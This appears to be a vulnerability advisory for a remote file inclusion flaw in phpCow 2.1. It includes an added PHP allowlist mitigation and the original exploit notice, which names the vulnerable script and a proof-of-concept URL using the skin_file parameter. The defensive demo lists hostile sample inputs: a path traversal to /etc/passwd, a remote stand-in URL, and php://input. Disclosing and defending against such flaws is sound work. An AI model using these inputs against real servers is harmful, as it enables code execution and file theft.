Vendor: phpCow
By: ViRuS_HiMa
CVSS: 7,5 HIGH
File Inclusion
CWE: 98
Product Name: phpCow
Affected Version From: 2.1
Affected Version To: 2.1
Patch Exists: NO
Related CWE: N/A
CPE: a:phpcow:phpcow:2.1
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Win7
2020

phpCow v2.1 File Inclusion Vulnerability

phpCow v2.1 is vulnerable to file inclusion due to insufficient sanitization of user-supplied input. The advisory below identifies the affected script as cowadmin/plugins/templateie/lib/templateie_install.class.php (line 14) and the request parameter as skin_file. An attacker can exploit the flaw by sending a specially crafted request to the vulnerable application, which can cause it to include a remote file containing arbitrary code and so execute that code on the server.

Mitigation:

Input validation should be used to prevent the inclusion of malicious files. Additionally, the application should be configured to only allow the inclusion of files from a trusted source.
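
One way to apply this mitigation in PHP, as an added example that is not phpCow's code and not part of the original advisory. It assumes the affected script passes the skin_file request value to include/require (the page does not show line 14); the function name resolve_skin_file, the skins directory and the allowlist are hypothetical.

```php
<?php
declare(strict_types=1);
// Added example, not phpCow code. Assumption: skin_file reaches include/require.
// resolve_skin_file(), the skins directory and the allowlist are hypothetical.

/** Map a requested skin name to a file inside $skinDir, or return null. */
function resolve_skin_file(string $requested, string $skinDir, array $allowed): ?string
{
    // 1. Allowlist: only names the application ships are accepted. URLs,
    //    stream wrappers and path separators never match an allowed name.
    if (!in_array($requested, $allowed, true)) {
        return null;
    }
    // 2. Containment: resolve symlinks and confirm the file stays in $skinDir.
    $base = realpath($skinDir);
    $path = realpath($skinDir . DIRECTORY_SEPARATOR . $requested . '.php');
    if ($base === false || $path === false) {
        return null;
    }
    // Compare against "$base/" so a sibling such as "skins_evil" cannot match.
    if (strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}

// Constructed demonstration: a temporary skins directory with one real skin.
$skinDir = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'skins_demo_' . getmypid();
if (!is_dir($skinDir)) {
    mkdir($skinDir, 0700);
}
file_put_contents($skinDir . DIRECTORY_SEPARATOR . 'default.php', "<?php return 'ok';\n");

$allowed = ['default'];
// Constructed sample inputs; only the first is a legitimate skin name.
$samples = ['default', '../../etc/passwd', 'http://example.invalid/skin.txt', 'php://input'];
foreach ($samples as $input) {
    $file = resolve_skin_file($input, $skinDir, $allowed);
    printf("%-34s => %s\n", $input, $file === null ? 'rejected' : 'include ' . basename($file));
}

unlink($skinDir . DIRECTORY_SEPARATOR . 'default.php');
rmdir($skinDir);

// Defence in depth for "files from a trusted source only": in php.ini set
// allow_url_include = Off, so include/require refuse URL targets even if
// a validation step is bypassed.
```

Only the value returned by the resolver is ever handed to include; the raw request parameter is never used as a path.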

Exploit-DB raw data:

[*]##############################################  
[+] |____ViRuS_HiMa@YouR SyS__|__\              #
[+] |______________________|___||\*___          #
[+] |______________________|___||""|"*\___,     #
[+] |______________________|___||""|*"|___||    #
[+] "([ (@)''(@)""""""(|*(@)(@)********(@)*     #
[+]====================================================================||
[*] About    : phpCow v2.1 File Inclusion Vulnerability                ||
[!] Site     : http://www.phpcow.com                                   ||
[!] Author   : ViRuS_HiMa                                              ||
[!] Site     : wWw.HeLL-z0ne.org                                       ||                                             
[!] E-Mail   : eGypT_GoVeRnMenT[at]HoTmaiL[dot]CoM                     ||
[!] TestedOn : Win7                                                    ||
[!]====================================================================||
[!]                  [H]eL[L] [Z]on[E] [C]re[W]                        ||
[!]====================================================================||
[!]                                                                    ||
[!] Vulned :                                                           ||
[!]                                                                    ||
[!]   cowadmin/plugins/templateie/lib/templateie_install.class.php     ||
[!]                                                                    ||
[!]   Notice"cowadmin" = "admin panel path"                            ||
[!]                                                                    ||
[!] in line 14                                                         ||
[!]                                                                    ||
[!] How to use :                                                       ||==========================
[!]                                                                                              ||
[!] http://localhost/cowadmin/plugins/templateie/lib/templateie_install.class.php?skin_file=Hima ||
[!]                                                                                              ||
[!]====================================================================||==========================
[!] Have Fun Sux PPlz :P                                               || 
[!] Greatz : Doksh,RedVirus,Kasper-Ksa,SadHacker,Indushka And Others.  ||
[*]====================================================================||